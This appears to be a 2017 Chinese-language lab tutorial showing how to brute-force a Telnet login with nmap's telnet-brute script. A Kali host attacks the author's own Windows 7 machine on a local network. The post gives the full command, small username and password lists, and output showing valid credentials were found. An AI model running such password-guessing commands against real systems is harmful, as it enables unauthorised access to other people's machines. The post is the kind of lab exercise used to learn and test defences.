【20171115中】nmap 使用腳本爆破telnet密碼
阿新 • • 發佈:2017-11-15
pts style logs images lan clas ip add bbbb 提升
今天老黑走出了低谷,設置了懲罰機制後效率提升了很多,現在寫一個使用nmap檢測目標主機漏洞和利用漏洞的文章,話不多說,直接開始!
0x01:環境介紹
主機A:系統 - kali2017,IP - 192.168.1.104
主機B:系統 - win7x64,IP - 192.168.1.103
使用主機A掃描並攻入主機B
0x02:確認主機B開啟了telnet的23端口
主機B沒有開啟,我自己開啟一下。
s1:控制面板 -> 程序 -> 打開或關閉windows程序 -> 選中下圖選項框,點擊確認後重啟系統。
s2:確認計算機telnet服務是否已經開啟。打開計算機右擊 -> 管理 -> 服務和應用程序 -> 服務 -> 找到Telnet服務,並將其開啟服務和設置自動
0x03:在主機A掃描確認主機B是否開啟了23端口
0x04:進行爆破
s1:參考官網了解,爆破命令如下
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>
s2:制造自己的myusers.lst和mypwds.lst
老黑將自己的賬號AAAA放在myusers.lst中,如下:
AAAA AA22 ASDFSA SDSDD
將自己的密碼BBBB放在mypwds.lst中,如下:
BBBB
BB23
DFASDFA
SADFAA
根據主機A的環境,調整命令,如下:
nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103
s3:執行命令,等待結果
root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST Nmap scan report for promote.cache-dns.local (192.168.1.103) Host is up (0.091s latency). PORT STATE SERVICE 23/tcp open telnet | telnet-brute: | Accounts: | AAAA:BBBB - Valid credentials |_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0 MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.) Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
0x05:telnet登陸主機B,WELL DONE!
【20171115中】nmap 使用腳本爆破telnet密碼